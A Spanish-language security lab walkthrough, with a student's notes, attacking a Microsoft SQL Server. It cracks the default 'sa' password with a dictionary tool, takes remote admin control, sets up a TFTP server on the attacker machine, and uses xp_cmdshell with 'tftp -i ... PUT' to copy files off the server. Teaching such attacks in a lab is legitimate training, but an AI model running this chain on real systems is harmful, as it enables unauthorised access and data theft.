*INSTALACIÓN DE SUPERSCAN
*EJECUTAMOS LA HERRAMIENTA SQLPING:
*EJECUTAMOS LA HERRAMIENTA DE LA BASE DE DATOS,
AQUÍ QUEDA YA CONFIGURADA EL PUERTO 1433
Fase 2.
En
este ejercicio, se utilizará la herramienta SQLDict, montando un ataque por
diccionario para encontrar la contraseña de acceso de la cuenta administrativa
“sa”.
|
Tarea
|
Pasos Detallados
|
|
1. Ejecutar SQLDict.
|
a. Ejecute el programa sqldict.exe desde el USB
b. En el campo Target server IP, introduzca 192.168.1.100
c. En el campo Target Account, asegúrese que se encuentra sa por default.
d. Seleccione Load Password File
e. Navegue a su USB, localice y seleccione el
archivo passwords.txt.
Nota: el archivo Passwords.txt contiene una selección de las palabras más
frecuentes que son utilizadas como contraseñas de acceso para diversos
servicios. Este archivo pertenece al CD “Openwall Wordlist Collection”,
disponible en http://openwall.net
f.
Seleccione Start. Después de algunos minutos, deberá aparecer la contraseña.
|
EJECUTAMOS LA HERRAMIENTA SQLDICT, EN TARGET SERVER
IP PONEMOS LA IP DE NUESTRA COMPUTADORA, EN TARGET ACCOUNT PONEMOS EL USUARIO
EN LOAD PASSORD CARGAMOS EL ARCHIVO .TXT Y LE DAMOS START:
Fase 3.
En
este ejercicio, se usara las herramientas administrativas Management Studio
para conectarse a un servidor y, aprovechando la existencia de una cuenta de
login que se instala por default, obtener el control total del servidor de
bases de datos, en forma remota y con privilegios administrativos.
|
Tarea
|
Pasos Detallados
|
|
1. Configurar la herramienta Enterprise Manager,
conectarse al servidor y controlarlo en forma remota.
|
a. Ejecute la herramienta administrativa
Management Studio en el menú Start |
Programs | Microsoft SQL Server 2005 | SQL Server Management Studio Express
b. En Nombre
de servidor, introduzca 192.168.1.100
c. En Autenticación,
seleccione Autenticación de SQL Server. Introduzca la cuenta sa, con la contraseña que crackeo en
el ejercicio anterior. Haga click en Conectar.
|
INSTALACIÓN DE MYSQL SERVER MANAGEMENT STUDIO
EXPRESS
EJECUTE LA HERRAMIENTA ADMINISTRATIVA
MANAGEMENT STUDIO EN EL MENÚ START | PROGRAMS | MICROSOFT SQL SERVER 2005 | SQL
SERVER MANAGEMENT STUDIO EXPRESS
EN NOMBRE DE SERVIDOR, INTRODUZCA 192.168.5.41
EN AUTENTICACIÓN, SELECCIONE AUTENTICACIÓN DE
SQL SERVER. INTRODUZCA LA CUENTA SA, CON LA CONTRASEÑA QUE CRACKEO EN EL
EJERCICIO ANTERIOR. HAGA CLICK EN CONECTAR
Fase 4.
En
este ejercicio, se instalará un servidor TFTP en la computadora atacante para
permitir la recepción y envío de archivos sin autenticación. Este software es
necesario debido a que el sistema operativo Windows contiene un cliente TFTP,
pero no el componente servidor.
|
Tarea
|
Pasos Detallados
|
|
1. Instalar un servidor TFTP
|
a. Inserte la memoria USB.
b. Abra el explorador de Windows, y navegue a la
ubicación del software TFTP Server:
Carpeta HERRAMIENTAS SQL
c. Ejecute el software instalador de TFTP
Server, SolarWinds-TFTP-Server.exe,
aceptando las opciones por default que presenta el asistente. Si le solicita
el CD de instalación de Microsoft Office, presione Cancelar.
d. En la opción File – Configure, seleccione la pestaña Security, activando la
opción “Transmit and Receive files”.
Presione “OK”.
|
EJECUCION DEL INSTALADOR TFTP SERVER SOLAR:
ACEPTAMOS LAS OPCIONES POR DEFAULT SERVER SOLAR:
INTERFAZ DEL PROGRAMA SERVER SOLAR:
OPCION FILE-CONFIGURE, SELECCIONAMOS LA PESTAÑA
SECURITY Y ACTIVAMOS LA OPCIÓN TRANSMIT AND RECEIVE FILES SERVER SOLAR:
Fase 5.
En
este ejercicio, se empleará la herramienta administrativa Query Analizer para
conectarse al servidor remoto y ejecutar comandos del sistema operativo para
navegar el disco duro. Este escenario simula la presencia de un archivo en el
servidor que nos interesa encontrar y transferir hacia la computadora atacante.
|
Tarea
|
Pasos Detallados
|
|
1. Conectarse al servidor remoto
|
a. En SQL Server Management Studio, selecciona Nueva consulta.
|
|
2. Ejecutar el extended stored procedure
xp_cmdshell para buscar y transferir un archivo hacia el hacker
|
a. En la ventana de consultas, introduzca y
ejecute el siguiente comando para localizar cualquier archivo de texto que
usaremos como ejemplo.
xp_cmdshell ‘dir
c:\*.txt /s’
b. Active el servidor TFTP en la computadora
atacante: menú Start | Programs |
SolarWinds 2001 Standard Edition | File Transfer | TFTP Server.
c. Transfiera el archivo encontrado hacia el
equipo cliente, ejecutando el siguiente stored procedure:
xp_cmdshell ‘tftp –i
192.168.1.# PUT path’
Sustituya
# por el número de estudiante que usted tiene asignado. Sustituya la
palabra path por la ruta completa
del archivo encontrado en el punto “a”. Si la ruta contiene espacios en
blanco, necesita incluirla entre comillas “ ”.
Por ejemplo, si el archivo que desea
transferir es c:\program files\test.txt,
ejecute:
xp_cmdshell ‘tftp
-i 192.168.1.# PUT “c:\program
files\test.txt”’
d. Verifique que el archive se transfirió hacia
la computadora atacante, revisando el contenido del directorio c:\TFTP-root
(el directorio que se configure por default para enviar y recibir archives
por TFTP).
|
